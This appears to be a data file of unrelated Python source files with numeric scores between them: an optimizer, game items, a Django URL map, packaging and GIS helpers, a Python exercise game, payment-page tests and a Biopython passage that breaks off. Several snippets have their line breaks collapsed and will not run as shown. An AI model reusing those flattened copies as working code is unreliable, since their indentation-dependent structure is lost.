""" _check_unknown_options(unknown_options) if jac is None: raise ValueError('Jacobian is currently required for trust-region ' 'methods') if hess is None and hessp is None: raise ValueError('Either the Hessian or the Hessian-vector product ' 'is currently required for trust-region methods') if subproblem is None: raise ValueError('A subproblem solving strategy is required for ' 'trust-region methods') if not (0 <= eta < 0.25): raise Exception('invalid acceptance stringency') if max_trust_radius <= 0: raise Exception('the max trust radius must be positive') if initial_trust_radius <= 0: raise ValueError('the initial trust radius must be positive') if initial_trust_radius >= max_trust_radius: raise ValueError('the initial trust radius must be less than the ' 'max trust radius') # force the initial guess into a nice format x0 = np.asarray(x0).flatten() # Wrap the functions, for a couple reasons. # This tracks how many times they have been called # and it automatically passes the args. nfun, fun = wrap_function(fun, args) njac, jac = wrap_function(jac, args) nhess, hess = wrap_function(hess, args) nhessp, hessp = wrap_function(hessp, args) # limit the number of iterations if maxiter is None: maxiter = len(x0)*200 # init the search status warnflag = 0 # initialize the search trust_radius = initial_trust_radius x = x0 if return_all: allvecs = [x] m = subproblem(x, fun, jac, hess, hessp) k = 0 # search for the function min while True: # Solve the sub-problem. # This gives us the proposed step relative to the current position # and it tells us whether the proposed step # has reached the trust region boundary or not. 
try: p, hits_boundary = m.solve(trust_radius) except np.linalg.linalg.LinAlgError as e: warnflag = 3 break # calculate the predicted value at the proposed point predicted_value = m(p) # define the local approximation at the proposed point x_proposed = x + p m_proposed = subproblem(x_proposed, fun, jac, hess, hessp) # evaluate the ratio defined in equation (4.4) actual_reduction = m.fun - m_proposed.fun predicted_reduction = m.fun - predicted_value if predicted_reduction <= 0: warnflag = 2 break rho = actual_reduction / predicted_reduction # update the trust radius according to the actual/predicted ratio if rho < 0.25: trust_radius *= 0.25 elif rho > 0.75 and hits_boundary: trust_radius = min(2*trust_radius, max_trust_radius) # if the ratio is high enough then accept the proposed step if rho > eta: x = x_proposed m = m_proposed # append the best guess, call back, increment the iteration count if return_all: allvecs.append(x) if callback is not None: callback(x) k += 1 # check if the gradient is small enough to stop if m.jac_mag < gtol: warnflag = 0 break # check if we have looked at enough iterations if k >= maxiter: warnflag = 1 break # print some stuff if requested status_messages = ( _status_message['success'], _status_message['maxiter'], 'A bad approximation caused failure to predict improvement.', 'A linalg error occurred, such as a non-psd Hessian.', ) if disp: if warnflag == 0: print(status_messages[warnflag]) else: print('Warning: ' + status_messages[warnflag]) print(" Current function value: %f" % m.fun) print(" Iterations: %d" % k) print(" Function evaluations: %d" % nfun[0]) print(" Gradient evaluations: %d" % njac[0]) print(" Hessian evaluations: %d" % nhess[0]) result = OptimizeResult(x=x, success=(warnflag == 0), status=warnflag, fun=m.fun, jac=m.jac, nfev=nfun[0], njev=njac[0], nhev=nhess[0], nit=k, message=status_messages[warnflag]) if hess is not None: result['hess'] = m.hess if return_all: result['allvecs'] = allvecs return result
0
'''
bombs.py
'''
from items import Item
import Items
import objects
import libtcodpy as libtcod

'''
====================
Bombs
====================
'''


class Bomb(Item):
    """Base class for timed bombs.

    A bomb is armed when dropped from an actor's inventory; tick() counts
    the fuse down every turn and fires effect() when it reaches zero.
    """

    # Bomb types start out unidentified.
    identified = False

    def __init__(self, game, x, y, char, name, color, level, timer,
                 blocks=False, properNoun=False):
        Item.__init__(self, game, x, y, char, name, color, level, blocks)
        # Keep the configured fuse length so the timer can be restored
        # every time the bomb is (re)dropped.
        self.resetTimer = timer
        self.timer = timer
        self.armed = False
        self.actor = None  # the actor who last dropped (armed) this bomb

    def use(self, actor):
        # Using a bomb simply drops -- and thereby arms -- it.
        self.dropFromInventory(actor)

    def dropFromInventory(self, actor):
        # Re-arm with a full fuse on every drop.
        self.timer = self.resetTimer
        self.armed = True
        self.actor = actor
        Item.dropFromInventory(self, actor)
        actor.game.message(actor.getName(True).title() + " dropped a " +
                           self.getName(False))

    def tick(self):
        # Count down only while armed; fire the effect when the fuse runs out.
        if self.armed:
            if self.timer == 0:
                self.effect()
                return
            self.timer -= 1

    def effect(self):
        # Default effect: identify the bomb type for its owner, then remove
        # the bomb from the world.  (Leftover debug print removed.)
        if self.actor is not None:
            self.identify(self.actor)
        self.destroy()

    def destroy(self):
        # Remove the bomb from the current level and the game object lists.
        self.game._currentLevel.removeItem(self)
        self.game._currentLevel.removeObject(self)
        self.game.removeObject(self)


class Grenade(Bomb):
    def effect(self):
        # Damage and blast volume scale with the bomb's level.
        physicalDam = 8 + (4*self.level)
        armorPenetration = int(self.level*1.5)
        fireDam = self.level
        damage = [physicalDam, armorPenetration, fireDam, 0, 0, 0, 0, 0, 0]
        # Double assignment kept: the volume is also cached on the instance.
        volume = self.volume = 15 + 3*self.level
        objects.Explosion(self.game, self.x, self.y, libtcod.yellow, damage,
                          volume)
        self.identify(self.actor)
        self.destroy()


class GasGrenade(Bomb):
    pass


class Smokebomb(Bomb):
    def effect(self):
        volume = 15 + 2*self.level
        objects.SmokeCloud(self.game, self.x, self.y, 'smoke',
                           libtcod.dark_grey, volume)
        self.identify(self.actor)
        self.destroy()


class FlachetteGrenade(Bomb):
    pass
    # Does physical damage and bleed damage


class FlashGrenade(Bomb):
    pass
    # confuses any actor within its effective range


class Spellbomb(Bomb):
    def __init__(self, game, x, y, char, name, color, level, timer,
                 blocks=False, properNoun=False):
        Bomb.__init__(self, game, x, y, char, name, color, level, timer)
        # Wrap this bomb in a free-to-cast spell named after the bomb.
        self.spell = Items.spells.Spell(self.game, self.name, self)
        self.spell.magicCost = 0

    def effect(self):
        # Note: this implementation only works if the spell requires no target
        self.spell.cast()
        self.identify(self.actor)
        self.destroy()
0.039689
"""django_blank URL Configuration The `urlpatterns` list routes URLs to views. For more information please see: https://docs.djangoproject.com/en/1.9/topics/http/urls/ Examples: Function views 1. Add an import: from my_app import views 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home') Class-based views 1. Add an import: from other_app.views import Home 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home') Including another URLconf 1. Import the include() function: from django.conf.urls import url, include 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls')) """ from django.conf.urls import url from django.contrib import admin from base import views urlpatterns = [ url(r'^admin/', admin.site.urls), url(r'^$', views.index, name='index'), url(r'^graph$', views.graph_data, name='graph'), url(r'^months$', views.available_months, name='months'), url(r'^days$', views.available_days, name='days'), url(r'^hours$', views.available_hours, name='hours'), url(r'^weatherlyzer.js$', views.weatherlyzer_js, name='weatherlyzer_js'), ]
0
#!/usr/bin/env python from __future__ import print_function import os, shutil, sys from optparse import OptionParser def findPackages(root,ignores): packages = set() for (dir, dirs, filenames) in os.walk(root): for filename in filter(lambda x: x == 'top_level.txt', filenames): path = os.path.join(dir, filename) with open(path) as f: for package in f: package = package.strip() for name in (package, package + '.py'): if os.path.exists(os.path.join(root, name)): if name in ignores: print('Ignore {} in {}.'.format(name, path)) else: print('Found {} in {}.'.format(name, path)) packages.add(name) return packages def ignorePackages(file): packages = [] if file is None: return packages with open(file) as f: for package in f: packages.append(package.strip().split(' ')[0]) return packages def dropSubpackages(packages): ''' Quick and dirty way to drop subpackages and only link their parent packages/directories. ''' copy = set(packages) for package in packages: drop = set() for p in copy: if (p != package) and (p.startswith(package + '/') or p.startswith(package + '\\')): print('Dropping subpackage {} in favor of {}.'.format(p, package)) drop.add(p) copy.difference_update(drop) return copy def link(sourceDir, targetDir, name, copy): source = os.path.join(sourceDir, name) target = os.path.join(targetDir, name) # Redefine targetDir to include any subdir paths that may have been present in target. targetDir = os.path.dirname(target) if os.path.exists(target): print('[!] Skipping {} (target already exists).'.format(target)) else: if not os.path.exists(targetDir): print('[!] 
Creating parent directory {}'.format(targetDir)) os.makedirs(targetDir) if copy: print('{} -> {}'.format(target, source)) (shutil.copytree if os.path.isdir(source) else shutil.copyfile)(source, target) else: relSource = os.path.relpath(source, targetDir) print('{} -> {}'.format(target, relSource)) os.symlink(relSource, target) def main(argv = sys.argv): parser = OptionParser( usage='usage: %prog [options] [path/to/site-packages/] path/to/target/dir', description='Will look for packages in your `site-packages\' ' + 'directory and symlink (or copy if the --copy flag is ' + 'present) them to the target directory. The ' + '`site-packages\' directory will be auto-discovered ' + 'if not provided.' ) parser.add_option('-c', '--copy', dest='copy', action='store_true', default=False, help='Copy packages instead of symlinking' ) parser.add_option('-i', '--ignore-file', dest='ignorefile', action='store', metavar='FILE', help='FILE that lists packages to ignore' ) (options, args) = parser.parse_args() copy = options.copy ignorefile = options.ignorefile if len(args) == 1: packageDirs = [ p for p in sys.path if p.startswith(os.environ['VIRTUAL_ENV']) and p.endswith('site-packages') ] if len(packageDirs) != 1: parser.error('ambiguous source directories, must specify explicitly') return sitePackages = packageDirs[0] elif len(args) == 2: sitePackages = args[0] else: parser.error('source and target directories must be specified') return target = args[-1] if not os.path.exists(sitePackages): print('Error: source directory `{}\' does not exist!'.format(sitePackages)) return packages = findPackages(sitePackages, ignorePackages(ignorefile)) packages = dropSubpackages(packages) print('{} packages: {}'.format('Copying' if copy else 'Linking', ', '.join(packages))) for package in packages: link(sitePackages, target, package, copy) statement = \ 'import os, sys\n' + \ 'sys.path.insert(0, os.path.join(os.path.dirname(__file__), \'{}\'))'.format(target.strip('/\\')) print('\nAdd the following 
to your appengine_config.py:\n') print(statement, '\n\n') if __name__ == '__main__': main()
0.031211
# -*- coding: utf-8 -*- """ *************************************************************************** general.py --------------------- Date : April 2013 Copyright : (C) 2013 by Victor Olaya Email : volayaf at gmail dot com *************************************************************************** * * * This program is free software; you can redistribute it and/or modify * * it under the terms of the GNU General Public License as published by * * the Free Software Foundation; either version 2 of the License, or * * (at your option) any later version. * * * *************************************************************************** """ __author__ = 'Victor Olaya' __date__ = 'April 2013' __copyright__ = '(C) 2013, Victor Olaya' # This will get replaced with a git SHA1 when you do a git archive __revision__ = '$Format:%H$' from processing.core.Processing import Processing from processing.gui.Postprocessing import handleAlgorithmResults from processing.core.parameters import ParameterSelection def alglist(text=None): s = '' for provider in Processing.algs.values(): sortedlist = sorted(provider.values(), key=lambda alg: alg.name) for alg in sortedlist: if text is None or text.lower() in alg.name.lower(): s += alg.name.ljust(50, '-') + '--->' + alg.commandLineName() \ + '\n' print s def algoptions(name): alg = Processing.getAlgorithm(name) if alg is not None: s = '' for param in alg.parameters: if isinstance(param, ParameterSelection): s += param.name + '(' + param.description + ')\n' i = 0 for option in param.options: s += '\t' + str(i) + ' - ' + str(option) + '\n' i += 1 print s else: print 'Algorithm not found' def alghelp(name): alg = Processing.getAlgorithm(name) if alg is not None: alg = alg.getCopy() print str(alg) algoptions(name) else: print 'Algorithm not found' def runalg(algOrName, *args): alg = Processing.runAlgorithm(algOrName, None, *args) if alg is not None: return alg.getOutputValuesAsDictionary() def runandload(name, *args): return 
Processing.runAlgorithm(name, handleAlgorithmResults, *args)
0
#!/usr/bin/env python3

from PIL import Image
from utils import lerp

import sys

if __name__ == "__main__":
    width = 320
    height = 256

    A = 128  # vertical amplitude used for the side gradients
    B = 64   # half-width of the flat center strip

    # Build a palette: 2 black entries, a ramp up to full cyan (g == b),
    # a ramp back down, and 2 more black entries; PIL palettes are flat
    # [r, g, b, ...] lists.
    pal = []

    for i in range(2):
        pal.extend([0, 0, 0])
    for i in range(6):
        c = int(lerp(0, 15, float(i) / 5))
        c = (c << 4) | c
        pal.extend([0, c, c])
    for i in range(6):
        c = int(lerp(15, 0, float(i) / 5))
        c = (c << 4) | c
        pal.extend([0, c, c])
    for i in range(2):
        pal.extend([0, 0, 0])

    im = Image.new('L', (width, height))
    im.putpalette(pal)
    pix = im.load()

    # Flat center strip: a plain vertical 15-color cycle.
    # BUG FIX: use floor division -- `width / 2` is a float on Python 3
    # (this file's shebang) and PIL pixel access requires integer
    # coordinates; the rest of the file already uses `//`.
    for i in range(-B, B):
        for j in range(height):
            pix[i + width // 2, j] = j % 15 + 1

    W = width // 2 - B
    minY = 0
    maxY = height

    # Side bands: interpolate the color cycle between a rising and a
    # falling envelope, mirrored onto the right half.
    for i in range(W):
        y0 = float(i * A) / W - A
        y1 = (height - 1) - y0
        dy = y1 - y0
        v0 = (minY - y0) * 256 / dy
        v1 = maxY + (maxY - y1) * 256 / dy
        for j in range(height):
            v = int(lerp(v0, v1, float(j) / 255))
            pix[i, j] = v % 15 + 1
            pix[width - i - 1, j] = v % 15 + 1

    im.save(sys.argv[1], "PNG")
0
#!/usr/bin/env python #/////////////////////////////////////////////////////////////// def levelCodeOrFail(lc=True): if lc: print '''Please enter the level code as first argument!''' else: print '''Sorry this is not correct, please try again.''' #/////////////////////////////////////////////////////////////// def level0(level_code=''): if not level_code: print ''' To complete this exercise you need to call this function with the level code: 8Xsu33Hn Here is an example: In [1]: level0('levelcode') ''' elif level_code=='8Xsu33Hn': print ''' Hoooray you made it! You can go to the next level. The level code is: 9fCkmGsy You will reach the next level by calling level1('9fCkmGsy') ''' else: print 'wrong level code' #/////////////////////////////////////////////////////////////// #float def level1(level_code='',input=''): if not level_code: levelCodeOrFail() elif level_code=='9fCkmGsy': if not input: print ''' To complete this exercise insert the number 4 as a float. Here is an example: In [1]: level1('levelcode',5.1) ''' elif isinstance(input, float) and input==4.0: print ''' Good! You can write either 4.0 or float(4) to make 4 a float. The next level code is: YXHIY9AF call level2('YXHIY9AF') ''' else: levelCodeOrFail(False) else: print 'wrong level code' #/////////////////////////////////////////////////////////////// #string def level2(level_code='',input=''): if not level_code: levelCodeOrFail() elif level_code=='YXHIY9AF': if not input: print ''' To complete this exercise insert the string: I like 2 go 2 the next level Hint: - if you put your string into a variable, you can reuse it in the next level. here is an example: In [1]: level2('levelcode','answer string') ''' elif input=='I like 2 go 2 the next level': print ''' You made it! 
The next level code is: L34XSOq9 call level3('L34XSOq9') ''' else: levelCodeOrFail(False) else: print 'wrong level code' #/////////////////////////////////////////////////////////////// #list (str.split()) def level3(level_code='',input=''): if not level_code: levelCodeOrFail() elif level_code=='L34XSOq9': if not input: print ''' To complete this exercise insert the string from level 2 as a list of words here is an example: In [1]: level3('levelcode',['answer', 'string']) ''' elif input==['I', 'like', '2', 'go', '2', 'the', 'next', 'level']: print ''' Right on! The intended way to do it was: my_string.split() The next level code is: XahS6y6l call level4('XahS6y6l') ''' else: levelCodeOrFail(False) else: print 'wrong level code' #/////////////////////////////////////////////////////////////// #list[index] def level4(level_code='',input=''): if not level_code: levelCodeOrFail() elif level_code=='XahS6y6l': if not input: print ''' To complete this exercise insert only the 3rd element of the list of words from level 3 Hints: - you can access list elements with list[index] - list start with the index 0 ''' elif input=='2': print ''' Congratulations! The next level code is: acjYW08p level5('acjYW08p') ''' else: levelCodeOrFail(False) else: print 'wrong level code' #/////////////////////////////////////////////////////////////// #splicing def level5(level_code='',input=''): if not level_code: levelCodeOrFail() elif level_code=='acjYW08p': if not input: print ''' To complete this exercise insert the string from level 2 as an array of words. This time insert only the first two elements and the last two elements as one list. Hints: - you can extract sub lists by with list[begin:end] - you can concatenate lists with the + sign ''' elif input==['I', 'like', 'next', 'level']: print ''' Phantastic! 
/ ,._/ (((6\ _,---) )r` ( ( )__)) ) /// \\\\\ \\\\\\ |\\\ ''' ''' The next level code is: B861yGOX level6('B861yGOX') ''' else: levelCodeOrFail(False) else: print 'wrong level code' #/////////////////////////////////////////////////////////////// #Dict def level6(level_code='',input=''): if not level_code: levelCodeOrFail() elif level_code=='B861yGOX': if not input: print ''' To complete this exercise put the following codon codes into a dictionary | Codon | AS | |============| | GCA | A | | AGU | S | | UGG | W | ''' elif input=={'GCA':'A', 'AGU':'S', 'UGG':'W'}: print """ Cowabonga! Fast and easy: my_dict = {'GCA':'A', 'AGU':'S', 'UGG':'W'} The next level code is: S8MvpTKz level7('S8MvpTKz') """ else: levelCodeOrFail(False) else: print 'wrong level code' #/////////////////////////////////////////////////////////////// #add element to dict def level7(level_code='',input=''): if not level_code: levelCodeOrFail() elif level_code=='S8MvpTKz': if not input: print ''' To complete this execise add the Stop-Codon 'UGA' ('UGA': 'Stop') to your dictionary. ''' elif input=={'GCA':'A', 'AGU':'S', 'UGG':'W', 'UGA':'Stop'}: print ''' All right! It is easy to add or change an element of your dictionary: my_dict['UGA'] = 'Stop' With my_dict.update({'UGA':'Stop'}) you can add or/and change multiple elements at once. The next level code is: tRT72s8m level8('tRT72s8m') ''' else: levelCodeOrFail(False) else: print 'wrong level code' #/////////////////////////////////////////////////////////////// #dict.keys def level8(level_code='',input=''): if not level_code: levelCodeOrFail() elif level_code=='tRT72s8m': if not input: print ''' To complete this exercise insert the keys of the dictionary from level 7 as a list. Hint: - In Ipython you will find methods for dictionaries by tabbing. ''' elif input==['GCA', 'AGU', 'UGG', 'UGA']: print ''' Hoooray! Yes! my_dict.keys() gave you a list of the keys, while my_dict.values() would give you a list of the values (here: ['A', 'S', 'W', 'Stop']). 
The next level code is: e82OApRu level9('e82OApRu') ''' else: levelCodeOrFail(False) else: print 'wrong level code' #/////////////////////////////////////////////////////////////// #dict.items def level9(level_code='',input=''): if not level_code: levelCodeOrFail() elif level_code=='e82OApRu': if not input: print ''' To complete this exercise produce a list of (key, value) pairs and insert it into the function. ''' elif input==[('GCA', 'A'), ('AGU', 'S'), ('UGG', 'W'), ('UGA', 'Stop')]: print ''' Well done! my_dict.items() produces a list of (key, value) pairs as 2-tuples. ."`". .-./ _=_ \.-. { (,(oYo),) }} {{ | " |} } { { \(---)/ }} {{ }'-=-'{ } } { { }._:_.{ }} {{ } -:- { } } {_{ }`===`{ _} ((((\) (/)))) The next level code is: Ju22w99B level10('Ju22w99B') ''' else: levelCodeOrFail(False) else: print 'wrong level code' #/////////////////////////////////////////////////////////////// #range def level10(level_code='',input=''): if not level_code: levelCodeOrFail() elif level_code=='Ju22w99B': if not input: print ''' To complete this exercise insert a list of integers from 0 to 941 into this function here is an example: In [1]: level10('levelcode',[1,2,3]) ''' elif input==range(942): print ''' Super! I'm sure you used range(942) instead of typing the whole thing. The next level code is: jDU0R8Jz level11('jDU0R8Jz') ''' else: levelCodeOrFail(False) else: print 'wrong level code' #/////////////////////////////////////////////////////////////// #sum def level11(level_code='',input=''): if not level_code: levelCodeOrFail() elif level_code=='jDU0R8Jz': if not input: print ''' To complete this exercise insert the sum of the integers from 0 to 941 into this function Hint: - You can use a loop here is an example: In [1]: level11('levelcode',1234) ''' elif input==443211: print ''' Ace! 
In [1]: my_sum = 0 In [2]: for element in xrange(942): ....: my_sum += element ....: The next level code is: GUa85gw3 level12('GUa85gw3') ''' else: levelCodeOrFail(False) else: print 'wrong level code' #/////////////////////////////////////////////////////////////// def level12(level_code='',input=''): if not level_code: levelCodeOrFail() elif level_code=='GUa85gw3': if not input: print ''' Do you find a list method to make the exercise from level 11 shorter and avoid the loop? Hint: - You can use the sum() function for many python objects. ''' elif input==443211: print ''' Almost done! In [1]: sum(xrange(942)) The next level code is: fu73LcBA level13('fu73LcBA') ''' else: levelCodeOrFail(False) else: print 'wrong level code' #/////////////////////////////////////////////////////////////// def level13(level_code='',input=''): if not level_code: levelCodeOrFail() elif level_code=='fu73LcBA': try: if not input: print ''' write a function that returns (not prints!) the string hello world insert your function as argument into this functions In [1]: level13('levelcode',myfunction) ''' elif input()=='hello world': print ''' One more! In [1]: def my_function(): ....: return 'hello world' ....: The next level code is: kK8SFqj5 level14('kK8SFqj5') ''' else: levelCodeOrFail(False) except: print "\nHint: Insert the function not its result!" else: print 'wrong level code' #/////////////////////////////////////////////////////////////// def level14(level_code='',input=''): if not level_code: levelCodeOrFail() elif level_code=='kK8SFqj5': try: if not input: print ''' write a function that takes one input argument if the input is 42 the function should return the bool True if the input is any other number larger than zero it should return the bool False if the input is a number smaller or equal to zero it should not return anything insert your function as argument ''' elif input(42) and not input(23) and input(0)==None and input(-34)==None: print ''' You made it all through!! 
In [1]: def my_2nd_function(my_input): ....: if my_input == 42: ....: return True ....: elif my_input > 0: ....: return False ....: Here is your typing rhino! , , /| |\./'. | | , \|| ,| \ \_(\.-""\//. _ .-'`""``"` _ ` `-.`"""--.._ _..----. __ | '~` o\ `"---" `. `"-.==, \,.-; `"` |`""`===` (` / | .-------. `-----.____.; \ | ; _|~~ ~~ |_ \__ | \ / =(_|_______|_)= .' .' \ ' `, |:::::::::| / / '._ | |:::::::[]| | '.---;`-.____.-'`\ `""`; | |o=======.| | _\ \ '. ) / \ `"""""""""` \-,--( / / _/ .' |_ _ .-) '----;)__; (`.-. ; `-:.;-' `""""` ''' else: levelCodeOrFail(False) except: print "\n:( this can't be right" else: print 'wrong level code' #/////////////////////////////////////////////////////////////// #/////////////////////////////////////////////////////////////// #if __name__=="__main__": print ''' This module contains excercises in the form of functions. The functions always expect a level code as input argument. If you solved the exercise the function will return the level code of the next level. start with level 0 by calling the function level0 level0() '''
0.028961
# -*- coding: utf-8 -*-
#
# This file is part of INSPIRE.
# Copyright (C) 2014-2017 CERN.
#
# INSPIRE is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# INSPIRE is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with INSPIRE. If not, see <http://www.gnu.org/licenses/>.
#
# In applying this license, CERN does not waive the privileges and immunities
# granted to it by virtue of its status as an Intergovernmental Organization
# or submit itself to any jurisdiction.

"""Approval action for INSPIRE arXiv harvesting."""

from __future__ import absolute_import, division, print_function

from invenio_db import db


class AuthorApproval(object):
    """Class representing the author approval action."""

    name = "Approve author"

    @staticmethod
    def resolve(obj, *args, **kwargs):
        """Resolve the action taken in the approval action.

        Reads the reviewer's decision from ``request_data['value']``,
        records it on the workflow object's ``extra_data``, persists the
        object and resumes the workflow asynchronously.
        """
        request_data = kwargs.get("request_data", {})
        value = request_data.get("value", "")

        # Both 'accept' and 'accept_curate' approve the author; only
        # 'accept_curate' additionally flags that a curation ticket is wanted.
        obj.extra_data["approved"] = value in ('accept', 'accept_curate')
        obj.extra_data["ticket"] = value == 'accept_curate'
        obj.extra_data["user_action"] = value

        obj.save()
        db.session.commit()
        obj.continue_workflow(delayed=True)
0
"""
Tests for the fake payment page used in acceptance tests.
"""
from collections import OrderedDict

from django.test import TestCase
from shoppingcart.processors.CyberSource2 import sign, verify_signatures
from shoppingcart.processors.exceptions import CCProcessorSignatureException
from shoppingcart.tests.payment_fake import PaymentFakeView


class PaymentFakeViewTest(TestCase):
    """
    Test that the fake payment view interacts
    correctly with the shopping cart.
    """

    def setUp(self):
        """Reset the fake view's payment status and build baseline POST params."""
        super(PaymentFakeViewTest, self).setUp()

        # Reset the view state so earlier tests cannot leak a status override
        PaymentFakeView.PAYMENT_STATUS_RESPONSE = "success"

        # Order matters for signing, hence the OrderedDict
        self.client_post_params = OrderedDict([
            ('amount', '25.00'),
            ('currency', 'usd'),
            ('transaction_type', 'sale'),
            ('orderNumber', '33'),
            ('access_key', '123456789'),
            ('merchantID', 'edx'),
            ('djch', '012345678912'),
            ('orderPage_version', 2),
            ('orderPage_serialNumber', '1234567890'),
            ('profile_id', "00000001"),
            ('reference_number', 10),
            ('locale', 'en'),
            ('signed_date_time', '2014-08-18T13:59:31Z'),
        ])

    def _put_status_and_get_decision(self, post_params, status):
        """
        Configure the fake view's payment status via an HTTP PUT of `status`
        (plain text), assert the PUT succeeded, then return the `decision`
        field the view would include in its response POST params.
        """
        resp = self.client.put(
            '/shoppingcart/payment_fake',
            data=status, content_type='text/plain'
        )
        self.assertEqual(resp.status_code, 200)

        resp_params = PaymentFakeView.response_post_params(post_params)
        return resp_params.get('decision')

    def test_accepts_client_signatures(self):
        """A correctly signed POST is served the payment form page."""
        # Generate shoppingcart signatures
        post_params = sign(self.client_post_params)

        # Simulate a POST request from the payment workflow
        # page to the fake payment page.
        resp = self.client.post(
            '/shoppingcart/payment_fake', dict(post_params)
        )

        # Expect that the response was successful
        self.assertEqual(resp.status_code, 200)

        # Expect that we were served the payment page
        # (not the error page)
        self.assertIn("Payment Form", resp.content)

    def test_rejects_invalid_signature(self):
        """A POST with a tampered signature is served the error page."""
        # Generate shoppingcart signatures
        post_params = sign(self.client_post_params)

        # Tamper with the signature
        post_params['signature'] = "invalid"

        # Simulate a POST request from the payment workflow
        # page to the fake payment page.
        resp = self.client.post(
            '/shoppingcart/payment_fake', dict(post_params)
        )

        # Expect that we got an error
        self.assertIn("Error", resp.content)

    def test_sends_valid_signature(self):
        """The response params generated by the view pass signature checks."""
        # Generate shoppingcart signatures
        post_params = sign(self.client_post_params)

        # Get the POST params that the view would send back to us
        resp_params = PaymentFakeView.response_post_params(post_params)

        # Check that the client accepts these
        try:
            verify_signatures(resp_params)
        except CCProcessorSignatureException:
            self.fail("Client rejected signatures.")

    def test_set_payment_status(self):
        """Each status keyword maps to the matching CyberSource decision."""
        # Generate shoppingcart signatures
        post_params = sign(self.client_post_params)

        # "decline" -> "DECLINE", "failure" -> "REJECT", "success" -> "ACCEPT"
        self.assertEqual(
            self._put_status_and_get_decision(post_params, "decline"),
            'DECLINE'
        )
        self.assertEqual(
            self._put_status_and_get_decision(post_params, "failure"),
            'REJECT'
        )
        self.assertEqual(
            self._put_status_and_get_decision(post_params, "success"),
            'ACCEPT'
        )
0
# Copyright 2008-2010 by Peter Cock. All rights reserved. # Revisions copyright 2009 by Cymon J. Cox. All rights reserved. # # This code is part of the Biopython distribution and governed by its # license. Please see the LICENSE file that should have been included # as part of this package. """Bio.SeqIO support for the "phd" file format. PHD files are output by PHRED and used by PHRAP and CONSED. You are expected to use this module via the Bio.SeqIO functions, under the format name "phd". See also the underlying Bio.Sequencing.Phd module. For example, using Bio.SeqIO we can read in one of the example PHRED files from the Biopython unit tests: >>> from Bio import SeqIO >>> for record in SeqIO.parse("Phd/phd1", "phd"): ... print(record.id) ... print("%s..." % record.seq[:10]) ... print("%s..." % record.letter_annotations["phred_quality"][:10]) 34_222_(80-A03-19).b.ab1 ctccgtcgga... [9, 9, 10, 19, 22, 37, 28, 28, 24, 22]... 425_103_(81-A03-19).g.ab1 cgggatccca... [14, 17, 22, 10, 10, 10, 15, 8, 8, 9]... 425_7_(71-A03-19).b.ab1 acataaatca... [10, 10, 10, 10, 8, 8, 6, 6, 6, 6]... Since PHRED files contain quality scores, you can save them as FASTQ or as QUAL files, for example using Bio.SeqIO.write(...), or simply with the format method of the SeqRecord object: >>> print(record[:50].format("fastq")) @425_7_(71-A03-19).b.ab1 acataaatcaaattactnaccaacacacaaaccngtctcgcgtagtggag + ++++))'''')(''')$!$''')''''(+.''$!$))))+)))''''''' <BLANKLINE> Or, >>> print(record[:50].format("qual")) >425_7_(71-A03-19).b.ab1 10 10 10 10 8 8 6 6 6 6 8 7 6 6 6 8 3 0 3 6 6 6 8 6 6 6 6 7 10 13 6 6 3 0 3 8 8 8 8 10 8 8 8 6 6 6 6 6 6 6 <BLANKLINE> Note these examples only show the first 50 bases to keep the output short. 
"""

from __future__ import print_function

from Bio.SeqRecord import SeqRecord
from Bio.Sequencing import Phd
from Bio.SeqIO.Interfaces import SequentialSequenceWriter
from Bio.SeqIO import QualityIO

__docformat__ = "restructuredtext en"


def PhdIterator(handle):
    """Return SeqRecord objects from a PHD file, one per sequence.

    This uses the Bio.Sequencing.Phd module to do the hard work: each
    parsed Phd record is repackaged as a SeqRecord whose per-letter
    annotations carry the PHRED qualities (and peak locations if present).
    """
    phd_records = Phd.parse(handle)
    for phd_record in phd_records:
        # Convert the PHY record into a SeqRecord...
        # The "filename" can contain spaces, e.g. 'HWI-EAS94_4_1_1_602_99 1'
        # from unit test example file phd_solexa.
        # This will cause problems if used as the record identifier
        # (e.g. output for FASTQ format), so only the first token is used
        # as id/name, while the full file name is kept as the description.
        name = phd_record.file_name.split(None, 1)[0]
        seq_record = SeqRecord(phd_record.seq,
                               id=name, name=name,
                               description=phd_record.file_name)
        # Just re-use the comments dictionary as the SeqRecord's annotations
        seq_record.annotations = phd_record.comments
        # And store the qualities and peak locations as per-letter-annotation
        # (each entry of phd_record.sites is base, quality[, peak_location])
        seq_record.letter_annotations["phred_quality"] = \
            [int(site[1]) for site in phd_record.sites]
        try:
            seq_record.letter_annotations["peak_location"] = \
                [int(site[2]) for site in phd_record.sites]
        except IndexError:
            # peak locations are not always there according to
            # David Gordon (the Consed author)
            pass
        yield seq_record
    # All done


class PhdWriter(SequentialSequenceWriter):
    """Class to write Phd format files.

    Emits one BEGIN_SEQUENCE/END_SEQUENCE entry per record, with the
    comment keywords taken from the record's annotations and the DNA
    section listing base, quality and (optionally) peak location per line.
    """

    def __init__(self, handle):
        SequentialSequenceWriter.__init__(self, handle)

    def write_record(self, record):
        """Write a single Phd record to the file.

        Raises ValueError (via QualityIO) when no usable quality scores are
        present, and asserts that sequence, qualities and peak locations
        (if any) all have matching lengths.
        """
        assert record.seq, "No sequence present in SeqRecord"
        # This method returns the 'phred_quality' scores or converted
        # 'solexa_quality' scores if present, else raises a value error
        phred_qualities = QualityIO._get_phred_quality(record)
        peak_locations = record.letter_annotations.get("peak_location", None)
        assert len(record.seq) == len(phred_qualities), "Number of " + \
            "phd quality scores does not match length of sequence"
        if peak_locations:
            assert len(record.seq) == len(peak_locations), "Number " + \
                "of peak location scores does not match length of sequence"
        if None in phred_qualities:
            raise ValueError("A quality value of None was found")
        # Avoid repeating the id at the start of the title line if the
        # description already begins with it.
        if record.description.startswith("%s " % record.id):
            title = record.description
        else:
            title = "%s %s" % (record.id, record.description)
        self.handle.write("BEGIN_SEQUENCE %s\nBEGIN_COMMENT\n"
                          % self.clean(title))
        # Write the known comment keywords (in Phd.CKEYWORDS order) that
        # have a value in the record's annotations.
        for annot in [k.lower() for k in Phd.CKEYWORDS]:
            value = None
            if annot == "trim":
                # 'trim' is stored as a 3-tuple formatted as
